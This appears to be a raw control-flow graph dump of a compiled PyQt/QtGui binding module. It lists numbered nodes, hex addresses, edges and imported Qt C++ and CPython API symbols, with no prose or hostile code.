PyBool_FromLong 4978->4980 4981 7ffb9a32f942 4978->4981 4982 7ffb9a32f958 4981->4982 4983 7ffb9a32f952 _Py_Dealloc 4981->4983 4983->4982 4984 7ffb9a2d3910 4985 7ffb9a2d3945 4984->4985 4986 7ffb9a2d397d 4984->4986 4989 7ffb9a2d394a PyType_IsSubtype 4985->4989 4990 7ffb9a2d3954 4985->4990 4987 7ffb9a2d3982 PyType_IsSubtype 4986->4987 4988 7ffb9a2d39bc 4986->4988 4987->4988 4987->4990 4991 7ffb9a2d39c6 PyLong_AsLong 4988->4991 4989->4990 4991->4990 4992 7ffb9a2d7910 4993 7ffb9a2d7952 4992->4993 4994 7ffb9a2d798d 4993->4994 4995 7ffb9a2d7960 ?maximumMargins@QPageLayout@@QEBA?AVQMarginsF@ 4993->4995 4996 7ffb9a2d7988 4995->4996 4997 7ffb9a301910 4998 7ffb9a30196f 4997->4998 4999 7ffb9a301973 ?setFileName@QPictureIO@@QEAAXAEBVQString@@ 4998->4999 5000 7ffb9a3019c0 4998->5000 5001 7ffb9a3019aa 4999->5001 5002 7ffb9a2ed910 PyLong_FromLong 5003 7ffb9a3678b0 5004 7ffb9a3678ee 5003->5004 5005 7ffb9a36790f 5004->5005 5006 7ffb9a3678f3 ?resetInternalData@QAbstractItemModel@ 5004->5006 5007 7ffb9a3178b0 5008 7ffb9a3178f2 5007->5008 5009 7ffb9a317910 5008->5009 5010 7ffb9a3178f6 ?lengthSquared@QVector4D@ PyFloat_FromDouble 5008->5010 5011 7ffb9a33f8b0 5012 7ffb9a33f8f2 5011->5012 5013 7ffb9a33f90e 5012->5013 5014 7ffb9a33f8f6 ?revision@QTextBlock@ PyLong_FromLong 5012->5014 5027 7ffb9a2e18f0 5028 7ffb9a2e1932 5027->5028 5029 7ffb9a2e1957 5028->5029 5030 7ffb9a2e1936 ?endRemoveRows@QAbstractItemModel@ 5028->5030 3676 7ffb9a35b4d0 3677 7ffb9a35b511 3676->3677 3678 7ffb9a35b538 3677->3678 3679 7ffb9a35b51f ??0QPainter@@QEAA 3677->3679 3680 7ffb9a35b5a9 3678->3680 3681 7ffb9a35b58b ??0QPainter@@QEAA@PEAVQPaintDevice@@ 3678->3681 3679->3678 5031 7ffb9a34b8d0 5032 7ffb9a34b91a 5031->5032 5033 7ffb9a34b91e ?angleAtPercent@QPainterPath@@QEBANN PyFloat_FromDouble 5032->5033 5034 7ffb9a34b93a 5032->5034 5039 7ffb9a3358d0 5040 7ffb9a335912 5039->5040 5041 7ffb9a335920 ?clipRegion@QPainter@@QEBA?AVQRegion@ 5040->5041 5042 7ffb9a33594d 5040->5042 5043 7ffb9a335948 5041->5043 5044 7ffb9a36d960 5045 7ffb9a36d9a7 5044->5045 5046 7ffb9a36d9db 5045->5046 5047 7ffb9a36d9b6 ?eventFilter@QObject@@UEAA_NPEAV1@PEAVQEvent@@ 5045->5047 5047->5046 5048 7ffb9a323960 5049 7ffb9a323a10 5048->5049 5050 7ffb9a323977 5048->5050 5050->5049 5051 7ffb9a3239f2 ?deallocate@QArrayData@@SAXPEAU1@_K1 5050->5051 5052 7ffb9a3239e0 ??1QTextFormat@@QEAA 5050->5052 5051->5049 5052->5051 5052->5052 5053 7ffb9a2e7950 5054 7ffb9a2e79ad 5053->5054 5055 7ffb9a2e79b1 ?replace@?$QVector@VQPoint@@@@QEAAXHAEBVQPoint@@ 5054->5055 5056 7ffb9a2e79de 5054->5056 5057 7ffb9a2ff950 5058 7ffb9a2ff9a5 5057->5058 5059 7ffb9a2ff9a9 ?reportContentOrientationChange@QWindow@@QEAAXW4ScreenOrientation@Qt@@ 5058->5059 5060 7ffb9a2ff9ce 5058->5060 5061 7ffb9a2f3950 5062 7ffb9a2f399a 5061->5062 5063 7ffb9a2f399e ?isValidCursorPosition@QTextLayout@@QEBA_NH PyBool_FromLong 5062->5063 5064 7ffb9a2f39bb 5062->5064 5065 7ffb9a2f7950 5066 7ffb9a2f79af 5065->5066 5067 7ffb9a2f79b3 ?setFormats@QTextLayout@@QEAAXAEBV?$QVector@UFormatRange@QTextLayout@@@@ 5066->5067 5068 7ffb9a2f7a00 5066->5068 5069 7ffb9a2f79ea 5067->5069 5070 7ffb9a34b970 5071 7ffb9a34b9b2 5070->5071 5072 7ffb9a34b9cf 5071->5072 5073 7ffb9a34b9b6 ?isCheckable@QStandardItem@ PyBool_FromLong 5071->5073 5074 7ffb9a321970 5075 7ffb9a321994 PyType_IsSubtype 5074->5075 5077 7ffb9a3219bd 5074->5077 5076 7ffb9a3219a1 5075->5076 5075->5077 5078 7ffb9a321ae1 5077->5078 5079 7ffb9a321a14 ??_0QVector4D@@QEAAAEAV0@M 5077->5079 5080 7ffb9a321a39 5077->5080 5081 7ffb9a321a8e 5080->5081 5082 7ffb9a321a6a ??_0QVector4D@@QEAAAEAV0@AEBV0@ 5080->5082 5083 7ffb9a321ab1 5081->5083 5084 7ffb9a321aa6 _Py_Dealloc 5081->5084 5083->5078 5085 7ffb9a321aba PyErr_Clear 5083->5085 5084->5083 5086 7ffb9a2d5940 5087 7ffb9a2d5982 5086->5087 5088 7ffb9a2d59bd 5087->5088 5089 7ffb9a2d5990 ?pageSize@QPageLayout@@QEBA?AVQPageSize@ 5087->5089 5090 7ffb9a2d59b8 5089->5090 5091 7ffb9a307940 5092 7ffb9a307945 5091->5092 5094 7ffb9a30797d 5091->5094 5093 7ffb9a307969 ?deallocate@QArrayData@@SAXPEAU1@_K1 5092->5093 5092->5094 5093->5094 5099 7ffb9a339980 5100 7ffb9a3399c2 5099->5100 5101 7ffb9a3399df 5100->5101 5102 7ffb9a3399c6 ?useHoverEffects@QStyleHints@ PyBool_FromLong 5100->5102 5103 7ffb9a331980 5104 7ffb9a3319ce 5103->5104 5105 7ffb9a3319d2 ?swap@QRegion@@QEAAXAEAV1@ 5104->5105 5106 7ffb9a3319f8 5104->5106 5107 7ffb9a335980 5108 7ffb9a3359cb 5107->5108 5109 7ffb9a3359cf 5108->5109 5110 7ffb9a3359e7 5108->5110 5111 7ffb9a3359d9 ??0QPalette@@QEAA 5109->5111 5112 7ffb9a335a42 5110->5112 5113 7ffb9a335a69 5110->5113 5137 7ffb9a335b6d 5111->5137 5114 7ffb9a335a4c ??0QPalette@@QEAA@AEBVQColor@@ 5112->5114 5115 7ffb9a335aac 5113->5115 5117 7ffb9a335ac7 5113->5117 5114->5137 5116 7ffb9a335ab6 ??0QPalette@@QEAA@W4GlobalColor@Qt@@ 5115->5116 5116->5137 5118 7ffb9a335b92 5117->5118 5119 7ffb9a335b32 5117->5119 5121 7ffb9a335cf1 5118->5121 5122 7ffb9a335e50 5118->5122 5120 7ffb9a335b3c ??0QPalette@@QEAA@AEBVQColor@@0 5119->5120 5120->5137 5123 7ffb9a335cfb ??0QPalette@@QEAA@AEBVQBrush@@00000000 5121->5123 5124 7ffb9a335eaf 5122->5124 5125 7ffb9a335e93 5122->5125 5123->5137 5127 7ffb9a335f0c ?canConvert@QVariant@@QEBA_NH 5124->5127 5124->5137 5126 7ffb9a335e9d ??0QPalette@@QEAA@AEBV0@ 5125->5126 5126->5137 5128 7ffb9a335f23 5127->5128 5134 7ffb9a335fc4 5127->5134 5129 7ffb9a335f2d ?userType@QVariant@ 5128->5129 5130 7ffb9a335f42 ?constData@QVariant@ ??0QPalette@@QEAA@AEBV0@ 5129->5130 5131 7ffb9a335f59 ??0QPalette@@QEAA ?convert@QVariant@@QEBA_NHPEAX 5129->5131 5130->5137 5132 7ffb9a335f8c ??0QPalette@@QEAA 5131->5132 5133 7ffb9a335f79 5131->5133 5135 7ffb9a335f95 ??1QPalette@@QEAA 5132->5135 5133->5135 5136 7ffb9a336017 _Py_Dealloc 5134->5136 5134->5137 5135->5137 5136->5137 5138 7ffb9a2db92e ??5@YAAEAVQDataStream@@AEAV0@AEAVQPainterPath@@ 5139 7ffb9a357990 5140 7ffb9a357a3f 5139->5140 5141 7ffb9a357a43 ?drawRoundedRect@QPainter@@QEAAXAEBVQRectF@@NNW4SizeMode@Qt@@ 5140->5141 5143 7ffb9a357a78 5140->5143 5142 7ffb9a357c5a 5141->5142 5143->5142 5144 7ffb9a357bf2 ??0QRectF@@QEAA@AEBVQRect@@ ?drawRoundedRect@QPainter@@QEAAXAEBVQRectF@@NNW4SizeMode@Qt@@ 5143->5144 5144->5142 5145 7ffb9a309990 PyList_New 5146 7ffb9a309a4a 5145->5146 5147 7ffb9a3099ce 5145->5147 5147->5146 5148 7ffb9a309a4f 5147->5148 5149 7ffb9a309a29 PyList_SetItem 5147->5149 5148->5146 5150 7ffb9a309a62 _Py_Dealloc 5148->5150 5149->5146 5149->5147 5150->5146 5151 7ffb9a32f990 5152 7ffb9a32f9d2 5151->5152 5153 7ffb9a32f9e0 ?supportedWritingSystems@QRawFont@@QEBA?AV?$QList@W4WritingSystem@QFontDatabase@@@ 5152->5153 5154 7ffb9a32fa0d 5152->5154 5155 7ffb9a32fa08 5153->5155 5156 7ffb9a333990 5157 7ffb9a3339bd 5156->5157 5158 7ffb9a3339e3 5157->5158 5159 7ffb9a3339d0 ??0QVector4D@@QEAA 5157->5159 5159->5158 5159->5159 5160 7ffb9a2e3920 5161 7ffb9a2e3999 5160->5161 5162 7ffb9a2e399d ?fill@?$QVector@VQPoint@@@@QEAAAEAV1@AEBVQPoint@@H 5161->5162 5163 7ffb9a2e39ce 5161->5163 5164 7ffb9a2e7920 5165 7ffb9a2e7938 5164->5165 5166 7ffb9a2e7942 PyLong_FromLong 5165->5166 5167 7ffb9a2e793d 5165->5167 5172 7ffb9a305920 5173 7ffb9a305999 5172->5173 5174 7ffb9a3059c1 5173->5174 5175 7ffb9a30599d ?insertImage@QTextCursor@@QEAAXAEBVQTextImageFormat@@ 5173->5175 5176 7ffb9a305a38 ?insertImage@QTextCursor@@QEAAXAEBVQTextImageFormat@@W4Position@QTextFrameFormat@@ 5174->5176 5177 7ffb9a305a4f 5174->5177 5185 7ffb9a3059ab 5175->5185 5176->5185 5178 7ffb9a305abd ?insertImage@QTextCursor@@QEAAXAEBVQString@@ 5177->5178 5179 7ffb9a305aec ??0?$QVector@VQPoint@@@@QEAA 5177->5179 5181 7ffb9a305ae7 5178->5181 5180 7ffb9a305b81 5179->5180 5182 7ffb9a305b85 ?insertImage@QTextCursor@@QEAAXAEBVQImage@@AEBVQString@@ 5180->5182 5183 7ffb9a305bd3 ??1QString@@QEAA 5180->5183 5181->5179 5184 7ffb9a305bb3 ??1QString@@QEAA 5182->5184 5183->5185 5184->5185 5186 7ffb9a2ed920 5187 7ffb9a2ed962 5186->5187 5188 7ffb9a2ed99d 5187->5188 5189 7ffb9a2ed970 ?allFormats@QTextDocument@@QEBA?AV?$QVector@VQTextFormat@@@ 5187->5189 5190 7ffb9a2ed998 5189->5190 5191 7ffb9a355920 5192 7ffb9a355940 5191->5192 5193 7ffb9a3559bb ?read@QStandardItem@@UEAAXAEAVQDataStream@@ 5192->5193 5194 7ffb9a3559c3 5192->5194 5193->5194 5195 7ffb9a36b920 5196 7ffb9a36b95e 5195->5196 5197 7ffb9a36b982 5196->5197 5198 7ffb9a36b966 ?tabletEvent@QWindow@@MEAAXPEAVQTabletEvent@@ 5196->5198 5199 7ffb9a311920 5200 7ffb9a311962 5199->5200 5201 7ffb9a31199d 5200->5201 5202 7ffb9a311970 ?pageBreakPolicy@QTextBlockFormat@@QEBA?AV?$QFlags@W4PageBreakFlag@QTextFormat@@@ 5200->5202 5203 7ffb9a311998 5202->5203 5204 7ffb9a2db996 ??5@YAAEAVQDataStream@@AEAV0@AEAVQPalette@@ 5209 7ffb9a2e1990 5210 7ffb9a2e19d2 5209->5210 5211 7ffb9a2e19d6 ?height@QTextLine@ PyFloat_FromDouble 5210->5211 5212 7ffb9a2e19ec 5210->5212 5213 7ffb9a303990 5214 7ffb9a3039ef 5213->5214 5215 7ffb9a3039f3 ?setName@QTouchDevice@@QEAAXAEBVQString@@ 5214->5215 5216 7ffb9a303a40 5214->5216 5217 7ffb9a303a2a 5215->5217 5218 7ffb9a307990 5219 7ffb9a3079d2 5218->5219 5220 7ffb9a307a0d 5219->5220 5221 7ffb9a3079e0 ?availableSize@QScreen@@QEBA?AVQSize@ 5219->5221 5222 7ffb9a307a08 5221->5222 5223 7ffb9a341930 5224 7ffb9a341972 5223->5224 5225 7ffb9a3419ad 5224->5225 5226 7ffb9a341980 ?textFormats@QTextBlock@@QEBA?AV?$QVector@UFormatRange@QTextLayout@@@ 5224->5226 5227 7ffb9a3419a8 5226->5227 5228 7ffb9a329930 5229 7ffb9a329972 5228->5229 5230 7ffb9a329976 ?testOption@QSurfaceFormat@@QEBA_NW4FormatOption@1@ PyBool_FromLong 5229->5230 5231 7ffb9a329994 5229->5231 5232 7ffb9a337930 5233 7ffb9a3379b4 5232->5233 5234 7ffb9a3379ec 5233->5234 5235 7ffb9a3379b8 ?setClipPath@QPainter@@QEAAXAEBVQPainterPath@@W4ClipOperation@Qt@@ 5233->5235 5236 7ffb9a2fd980 5237 7ffb9a2fd9c2 5236->5237 5238 7ffb9a2fd9e7 5237->5238 5239 7ffb9a2fd9c6 ?removeSelectedText@QTextCursor@ 5237->5239 5240 7ffb9a2f9980 PyObject_GetIter 5241 7ffb9a2f99aa PyErr_Clear 5240->5241 5242 7ffb9a2f9a01 5240->5242 5243 7ffb9a2f99b5 5241->5243 5244 7ffb9a2f99d4 5241->5244 5245 7ffb9a2f9af1 5242->5245 5248 7ffb9a2f9a19 ?sharedNull@QArrayData@@SAPEAU1 PyErr_Clear PyIter_Next 5242->5248 5246 7ffb9a2f99c4 PyType_GetFlags 5243->5246 5247 7ffb9a2f99bb _Py_Dealloc 5243->5247 5246->5244 5247->5246 5249 7ffb9a2f9a99 PyErr_Occurred 5248->5249 5255 7ffb9a2f9a3e 5248->5255 5250 7ffb9a2f9b56 5249->5250 5254 7ffb9a2f9aa8 5249->5254 5250->5245 5252 7ffb9a2f9b5c _Py_Dealloc 5250->5252 5251 7ffb9a2f9a40 PyErr_Clear PyLong_AsUnsignedLongLongMask PyErr_Occurred 5251->5255 5256 7ffb9a2f9b10 PyErr_Format 5251->5256 5252->5245 5253 7ffb9a2f9ac4 ?deallocate@QArrayData@@SAXPEAU1@_K1 5257 7ffb9a2f9ad5 5253->5257 5254->5253 5254->5257 5255->5251 5259 7ffb9a2f9a76 _Py_Dealloc 5255->5259 5260 7ffb9a2f9a7f PyErr_Clear PyIter_Next 5255->5260 5256->5254 5261 7ffb9a2f9b48 _Py_Dealloc 5256->5261 5257->5245 5262 7ffb9a2f9ae8 _Py_Dealloc 5257->5262 5259->5260 5260->5249 5260->5251 5261->5254 5262->5245 5263 7ffb9a2e9980 5264 7ffb9a2e99d5 5263->5264 5265 7ffb9a2e99d9 ?objectForFormat@QTextDocument@@QEBAPEAVQTextObject@@AEBVQTextFormat@@ 5264->5265 5266 7ffb9a2e9a08 5264->5266 5267 7ffb9a2e9a03 5265->5267 5268 7ffb9a30f940 5269 7ffb9a30f982 5268->5269 5270 7ffb9a30f9d0 5269->5270 5271 7ffb9a30f995 ?lengthProperty@QTextFormat@@QEBA?AVQTextLength@@H 5269->5271 5272 7ffb9a30f9c6 5271->5272 5280 7ffb9a34d950 5281 7ffb9a34d992 5280->5281 5282 7ffb9a34d9af 5281->5282 5283 7ffb9a34d996 ?isDropEnabled@QStandardItem@ PyBool_FromLong 5281->5283 5284 7ffb9a36f950 5285 7ffb9a36f9ea 5284->5285 5288 7ffb9a36f96d 5284->5288 5286 7ffb9a36f970 ?format@QPictureIO@ ?qstrcmp@@YAHPEBD0 5287 7ffb9a36f99d 5286->5287 5286->5288 5287->5285 5290 7ffb9a36f9e1 _Py_Dealloc 5287->5290 5288->5286 5289 7ffb9a36f992 5288->5289 5290->5285 5291 7ffb9a30d950 5292 7ffb9a30d98b 5291->5292 5293 7ffb9a30d9c9 5292->5293 5294 7ffb9a30d9b0 ??0QPicture@@QEAA@H 5292->5294 5294->5293 5294->5294 5299 7ffb9a2eb960 5301 7ffb9a2eb9a2 5299->5301 5300 7ffb9a2eb9dd 5301->5300 5302 7ffb9a2eb9b0 ?defaultFont@QTextDocument@@QEBA?AVQFont@ 5301->5302 5303 7ffb9a2eb9d8 5302->5303 5304 7ffb9a34d9e0 5305 7ffb9a34da15 5304->5305 5306 7ffb9a34da37 5305->5306 5307 7ffb9a34da24 ??0QTextFormat@@QEAA 5305->5307 5307->5306 5307->5307 5308 7ffb9a36b9e0 5309 7ffb9a36ba1e 5308->5309 5310 7ffb9a36ba42 5309->5310 5311 7ffb9a36ba23 ?format@QWindow@@UEBA?AVQSurfaceFormat@ 5309->5311 5312 7ffb9a33b9e0 5313 7ffb9a33ba00 5312->5313 5314 7ffb9a33b9e5 ??1QPainterPathStroker@@QEAA 5312->5314 5314->5313 5315 7ffb9a3419e0 5316 7ffb9a341a2a 5315->5316 5317 7ffb9a341a6a 5316->5317 5318 7ffb9a341a38 ?property@QTextFormat@@QEBA?AVQVariant@@H 5316->5318 5319 7ffb9a341a65 5318->5319 5320 7ffb9a32b9e0 ??0QTransform@@QEAA 5321 7ffb9a32bab5 5320->5321 5322 7ffb9a32bac3 ?alphaMapForGlyph@QRawFont@@QEBA?AVQImage@@IW4AntialiasingType@1@AEBVQTransform@@ 5321->5322 5323 7ffb9a32bb23 5321->5323 5324 7ffb9a32bb12 5322->5324 5325 7ffb9a2fb9d0 5326 7ffb9a2fb9f0 5325->5326 5327 7ffb9a2fba54 ?surfaceType@QOffscreenSurface@@UEBA?AW4SurfaceType@QSurface@ 5326->5327 5328 7ffb9a2fba5c 5326->5328 5327->5328 5329 7ffb9a35b9f0 5330 7ffb9a35ba45 5329->5330 5331 7ffb9a35ba6f 5330->5331 5332 7ffb9a35ba49 ?setFormat@QTextObject@@IEAAXAEBVQTextFormat@@ 5330->5332 5333 7ffb9a3619f0 5334 7ffb9a361a39 5333->5334 5335 7ffb9a361a65 ??0?$QVector@VQPoint@@@@QEAA 5334->5335 5336 7ffb9a361b06 5334->5336 5337 7ffb9a361a85 5335->5337 5338 7ffb9a361a89 ?begin@?$QVector@VQPoint@@@@QEBAPEBVQPoint@ ?receivers@QObject@@IEBAHPEBD 5337->5338 5339 7ffb9a361aa6 5337->5339 5340 7ffb9a361ac8 PyLong_FromLong 5338->5340 5339->5340 5341 7ffb9a361ad3 ??1QByteArray@@QEAA 5339->5341 5342 7ffb9a361ae7 ??1QByteArray@@QEAA 5339->5342 5340->5341 5342->5336 5344 7ffb9a30d9f0 5346 7ffb9a30da32 5344->5346 5345 7ffb9a30da6d 5346->5345 5347 7ffb9a30da40 ?manufacturer@QScreen@@QEBA?AVQString@ 5346->5347 5348 7ffb9a30da68 5347->5348 5353 7ffb9a2d79c0 5354 7ffb9a2d7a02 5353->5354 5355 7ffb9a2d7a0a PyEval_SaveThread ?sender@QObject@@IEBAPEAV1 PyEval_RestoreThread 5354->5355 5356 7ffb9a2d7a8e 5354->5356 5357 7ffb9a2d7a3e 5355->5357 5358 7ffb9a35da00 5359 7ffb9a35da16 5358->5359 5360 7ffb9a35da4d 5359->5360 5361 7ffb9a35da32 ??1QTextDocumentWriter@@QEAA 5359->5361 5361->5360 5362 7ffb9a34ba00 5363 7ffb9a34ba4a 5362->5363 5364 7ffb9a34ba4e ?slopeAtPercent@QPainterPath@@QEBANN PyFloat_FromDouble 5363->5364 5365 7ffb9a34ba6a 5363->5365 5373 7ffb9a30fa00 5374 7ffb9a30fa42 5373->5374 5375 7ffb9a30fa5c 5374->5375 5376 7ffb9a30fa46 ?widthF@QPen@ PyFloat_FromDouble 5374->5376 5381 7ffb9a2e59b0 5382 7ffb9a2e59c7 5381->5382 5383 7ffb9a2e5a82 5381->5383 5389 7ffb9a363ee0 5382->5389 5385 7ffb9a2e5a64 ?deallocate@QArrayData@@SAXPEAU1@_K1 5385->5383 5387 7ffb9a2e5a40 ??1QTextFormat@@QEAA ??1QTextCursor@@QEAA 5387->5387 5388 7ffb9a2e5a5f 5387->5388 5388->5385 5390 7ffb9a363efb 5389->5390 5394 7ffb9a2e59d4 5389->5394 5391 7ffb9a363f2b ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 5390->5391 5392 7ffb9a363f14 ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 5390->5392 5393 7ffb9a363f38 5391->5393 5392->5393 5393->5394 5395 7ffb9a363f82 ??0QTextCursor@@QEAA@AEBV0@ ??0QFont@@QEAA@AEBV0@ 5393->5395 5394->5383 5394->5385 5394->5387 5395->5394 5395->5395 5396 7ffb9a2f59b0 5397 7ffb9a2f59db 5396->5397 5398 7ffb9a2f59ff 5397->5398 5399 7ffb9a2f59df ?setCacheLimit@QPixmapCache@@SAXH 5397->5399 5404 7ffb9a339a10 5405 7ffb9a339a52 5404->5405 5406 7ffb9a339a60 ?window@QPainter@@QEBA?AVQRect@ 5405->5406 5407 7ffb9a339a8d 5405->5407 5408 7ffb9a339a88 5406->5408 5409 7ffb9a33ba10 5410 7ffb9a33ba6a 5409->5410 5411 7ffb9a33ba6e ?distanceToLine@QVector2D@@QEBAMAEBV1@0 PyFloat_FromDouble 5410->5411 5412 7ffb9a33ba95 5410->5412 5413 7ffb9a343a10 5414 7ffb9a343a5a 5413->5414 5415 7ffb9a343a9a 5414->5415 5416 7ffb9a343a68 ?colorProperty@QTextFormat@@QEBA?AVQColor@@H 5414->5416 5417 7ffb9a343a95 5416->5417 5418 7ffb9a2d99a0 5419 7ffb9a2d99c9 5418->5419 5420 7ffb9a2d99d1 5419->5420 5421 7ffb9a2d9a45 5419->5421 5422 7ffb9a2d9a1b ??8@YA_NAEBVQPageLayout@@0 PyBool_FromLong 5419->5422 5423 7ffb9a2d9a5b 5421->5423 5424 7ffb9a2d9a55 _Py_Dealloc 5421->5424 5424->5423 5425 7ffb9a31d9a0 5426 7ffb9a31d9f7 5425->5426 5427 7ffb9a31d9fb 5426->5427 5429 7ffb9a31da3d 5426->5429 5430 7ffb9a31da05 ??TQRegion@@QEBA?BV0@AEBV0@ 5427->5430 5428 7ffb9a31da60 5429->5428 5431 7ffb9a31da55 _Py_Dealloc 5429->5431 5432 7ffb9a31da32 5430->5432 5431->5428 5433 7ffb9a3439a0 5434 7ffb9a3439cd 5433->5434 5435 7ffb9a3439f3 5434->5435 5436 7ffb9a3439e0 ??0QVector2D@@QEAA 5434->5436 5436->5435 5436->5436 5441 7ffb9a2e7a10 5442 7ffb9a2e7a36 5441->5442 5443 7ffb9a2e7b18 5442->5443 5444 7ffb9a2e7aa7 5442->5444 5447 7ffb9a2e7b95 5443->5447 5448 7ffb9a2e7b5c ?parent@QObject@@QEBAPEAV1 5443->5448 5445 7ffb9a2e7ac5 ?parent@QStandardItemModel@@UEBA?AVQModelIndex@@AEBV2@ 5444->5445 5446 7ffb9a2e7ad2 5444->5446 5445->5446 5449 7ffb9a2e7b84 5448->5449 5450 7ffb9a2eba10 5451 7ffb9a2eba19 5450->5451 5452 7ffb9a2eba54 5450->5452 5451->5452 5453 7ffb9a2eba41 ??1QTextFormat@@QEAA 5451->5453 5453->5452 5453->5453 5454 7ffb9a3599b0 5455 7ffb9a3599d3 5454->5455 5456 7ffb9a359a85 ?validate@QRegExpValidator@@UEBA?AW4State@QValidator@@AEAVQString@@AEAH 5455->5456 5457 7ffb9a359a8d 5455->5457 5456->5457 5458 7ffb9a3259b0 5459 7ffb9a3259d0 5458->5459 5460 7ffb9a325a34 ?paintEngine@QPdfWriter@@MEBAPEAVQPaintEngine@ 5459->5460 5461 7ffb9a325a3c 5459->5461 5460->5461 5462 7ffb9a32d9b0 5463 7ffb9a32d9d3 PyList_New 5462->5463 5464 7ffb9a32d9f6 5463->5464 5467 7ffb9a32da6b 5463->5467 5465 7ffb9a32da6d 5464->5465 5466 7ffb9a32da48 PyList_SetItem 5464->5466 5464->5467 5465->5467 5468 7ffb9a32da73 _Py_Dealloc 5465->5468 5466->5464 5466->5467 5468->5467 5469 7ffb9a2e3a00 5471 7ffb9a2e3a23 5469->5471 5470 7ffb9a2e3a2b 5471->5470 5472 7ffb9a2e3a7f PyBool_FromLong 5471->5472 5473 7ffb9a2e3abe 5471->5473 5474 7ffb9a2e3ad4 5473->5474 5476 7ffb9a2e3ace _Py_Dealloc 5473->5476 5476->5474 5477 7ffb9a2d3a00 5478 7ffb9a2d3a85 5477->5478 5479 7ffb9a2d3a89 ?fill@?$QVector@VQPointF@@@@QEAAAEAV1@AEBVQPointF@@H 5478->5479 5480 7ffb9a2d3adb 5478->5480 5481 7ffb9a2d3ac2 5479->5481 5482 7ffb9a2ffa00 5483 7ffb9a2ffa42 5482->5483 5484 7ffb9a2ffa46 ?quality@QPictureIO@ PyLong_FromLong 5483->5484 5485 7ffb9a2ffa5e 5483->5485 5486 7ffb9a2eda00 5487 7ffb9a2eda1d PyErr_Occurred 5486->5487 5488 7ffb9a2eda2a 5487->5488 5489 7ffb9a2db9fe ??5@YAAEAVQDataStream@@AEAV0@AEAVQPen@@ 5490 7ffb9a3699c0 5491 7ffb9a369a07 5490->5491 5492 7ffb9a369a0f ?drawPolygon@QPaintEngine@@UEAAXPEBVQPoint@@HW4PolygonDrawMode@1@ 5491->5492 5493 7ffb9a369a23 5491->5493 5492->5493 5494 7ffb9a30b9c0 PyList_New 5495 7ffb9a30ba34 5494->5495 5496 7ffb9a30b9ed 5494->5496 5496->5495 5497 7ffb9a30ba0c PyLong_FromUnsignedLong 5496->5497 5498 7ffb9a30ba17 PyList_SetItem 5497->5498 5499 7ffb9a30ba39 5497->5499 5498->5495 5498->5496 5499->5495 5500 7ffb9a30ba3f _Py_Dealloc 5499->5500 5500->5495 5501 7ffb9a3459c0 5502 7ffb9a3459e4 PyType_IsSubtype 5501->5502 5504 7ffb9a345a0d 5501->5504 5503 7ffb9a3459f1 5502->5503 5502->5504 5505 7ffb9a345b3e 5504->5505 5506 7ffb9a345aeb 5504->5506 5507 7ffb9a345a68 5504->5507 5510 7ffb9a345b0e 5506->5510 5513 7ffb9a345b03 _Py_Dealloc 5506->5513 5508 7ffb9a345aab 5507->5508 5509 7ffb9a345a70 ??0iterator@QTextFrame@@QEAA@AEBV01@ ??Eiterator@QTextFrame@@QEAAAEAV01 5507->5509 5512 7ffb9a345ad5 5508->5512 5515 7ffb9a345ab0 ??0iterator@QTextFrame@@QEAA@AEBV01@ ??Fiterator@QTextFrame@@QEAAAEAV01 5508->5515 5509->5509 5511 7ffb9a345a95 5509->5511 5510->5505 5514 7ffb9a345b17 PyErr_Clear 5510->5514 5513->5510 5515->5512 5515->5515 5516 7ffb9a32b9c0 ??4QTextOption@@QEAAAEAV0@AEBV0@ 5517 7ffb9a2d59f0 PyList_New 5518 7ffb9a2d5aa9 5517->5518 5519 7ffb9a2d5a2e 5517->5519 5519->5518 5520 7ffb9a2d5a4a ??0QBrush@@QEAA@AEBV0@ 5519->5520 5521 7ffb9a2d5a8b PyList_SetItem 5519->5521 5522 7ffb9a2d5aae 5519->5522 5520->5519 5521->5518 5521->5519 5523 7ffb9a2d5ac9 5522->5523 5524 7ffb9a2d5ab3 ??1QKeySequence@@QEAA 5522->5524 5523->5518 5525 7ffb9a2d5acf _Py_Dealloc 5523->5525 5524->5523 5525->5518 5526 7ffb9a3019f0 5527 7ffb9a301a32 5526->5527 5528 7ffb9a301a57 5527->5528 5529 7ffb9a301a36 ?depth@QScreen@ 5527->5529 5530 7ffb9a2f39f0 5531 7ffb9a2f3a32 5530->5531 5532 7ffb9a2f3a36 PyFloat_FromDouble 5531->5532 5533 7ffb9a2f3a4b 5531->5533 5534 7ffb9a3279d0 5535 7ffb9a327a1a 5534->5535 5536 7ffb9a327a1e ?setMinorVersion@QSurfaceFormat@@QEAAXH 5535->5536 5537 7ffb9a327a43 5535->5537 5546 7ffb9a3179d0 5547 7ffb9a317a46 5546->5547 5548 7ffb9a317a7b 5547->5548 5549 7ffb9a317a4a ?setFlag@QWindow@@QEAAXW4WindowType@Qt@@_N 5547->5549 5550 7ffb9a3299d0 5551 7ffb9a329a12 5550->5551 5552 7ffb9a329a3c 5551->5552 5553 7ffb9a329a16 ?style@QRawFont@@QEBA?AW4Style@QFont@ 5551->5553 5554 7ffb9a329a37 5553->5554 5555 7ffb9a2df9e5 ??6@YAAEAVQDataStream@@AEAV0@AEBVQColor@@ 5556 7ffb9a2dfa03 PyEval_RestoreThread 5555->5556 5557 7ffb9a2dfa29 5556->5557 5570 7ffb9a31ba60 5571 7ffb9a31ba84 PyType_IsSubtype 5570->5571 5574 7ffb9a31baad 5570->5574 5572 7ffb9a31ba91 5571->5572 5571->5574 5573 7ffb9a31bb87 5574->5573 5575 7ffb9a31bb10 ??_6QRegion@@QEAAAEAV0@AEBV0@ 5574->5575 5576 7ffb9a31bb34 5574->5576 5577 7ffb9a31bb57 5576->5577 5578 7ffb9a31bb4c _Py_Dealloc 5576->5578 5577->5573 5579 7ffb9a31bb60 PyErr_Clear 5577->5579 5578->5577 5580 7ffb9a311a60 5581 7ffb9a311aaa 5580->5581 5582 7ffb9a311aae ?appendColumns@QTextTable@@QEAAXH 5581->5582 5583 7ffb9a311ad3 5581->5583 5584 7ffb9a30ba60 5585 7ffb9a30bad7 5584->5585 5586 7ffb9a30bb2f 5585->5586 5587 7ffb9a30bae5 ?transformBetween@QScreen@@QEBA?AVQTransform@@W4ScreenOrientation@Qt@@0AEBVQRect@@ 5585->5587 5588 7ffb9a30bb27 5587->5588 5589 7ffb9a2dda50 5590 7ffb9a2dda92 5589->5590 5591 7ffb9a2ddada 5590->5591 5592 7ffb9a2ddaa5 ?blockList@QTextBlockGroup@@IEBA?AV?$QList@VQTextBlock@@@ 5590->5592 